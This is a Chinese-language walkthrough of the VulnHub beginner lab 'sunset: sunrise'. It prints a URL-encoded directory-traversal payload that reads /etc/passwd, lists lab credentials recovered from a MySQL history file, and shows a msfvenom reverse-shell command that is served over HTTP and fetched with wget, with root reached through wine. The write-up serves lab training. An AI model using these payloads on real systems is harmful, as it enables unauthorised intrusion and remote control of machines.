vulnhub靶场之sunset: sunrise

说明:玩得开心!
难度:初学者
联系人:@ whitecr0wz
vulnhub靶场之sunset: sunrise_第1张图片
http://192.168.0.108/
vulnhub靶场之sunset: sunrise_第2张图片
目录扫描,无结果。
vulnhub靶场之sunset: sunrise_第3张图片
端口扫描,开了3306 8080
vulnhub靶场之sunset: sunrise_第4张图片
有个目录浏览,就一个文件。
这里需要主要 generated by weborf/0.12.2
这东西网上一搜
vulnhub靶场之sunset: sunrise_第5张图片
目录遍历的洞
/…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd
vulnhub靶场之sunset: sunrise_第6张图片
读取/etc/passwd
vulnhub靶场之sunset: sunrise_第7张图片
这里可以读取当前权限下的所有文件(隐藏文件看不到)
慢慢翻
在这里插入图片描述
http://192.168.0.108:8080/html//…%2f…%2f…%2f…%2f…%2f…%2f…%2fhome%2fsunrise%2fuser.txt
这里翻到一个 user.txt,猜测是md5密码,拿去解密,无结果。
点卡在这里了,想不出来,看了writeup.
答案写weborf下有一个.mysql_history文件。
show databases;
ALTER USER ‘weborf’@‘localhost’ IDENTIFIED BY ‘iheartrainbows44’;
weborf 是账号 密码是iheartrainbows44
这个是Mysl也是ssh的。

成功登录
vulnhub靶场之sunset: sunrise_第8张图片
查看数据库,发现账号密码
sunrise thefutureissobrightigottawearshades
ssh登录。
在这里插入图片描述
vulnhub靶场之sunset: sunrise_第9张图片
发现wine可以以root执行。
不知道这个,上网查了下资料。
vulnhub靶场之sunset: sunrise_第10张图片
发现是可以用wine在Linux里运行windows的软件。
msf木马
msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 LHOST=192.168.43.253 LPORT=6666 -o 222.exe
vulnhub靶场之sunset: sunrise_第11张图片
Python2 -m SimpleHTTPServer
在靶机中wget shell
vulnhub靶场之sunset: sunrise_第12张图片
最后
vulnhub靶场之sunset: sunrise_第13张图片
拿到flag.txt
我认为这道题的解体难点在于找到那个隐藏的.mysql_history文件,以后做这类题碰到目录遍历,可以试着用扫描器扫下Home下的文件,个人感觉这里的东西会多一点。

你可能感兴趣的:(vulnhub靶场之sunset: sunrise)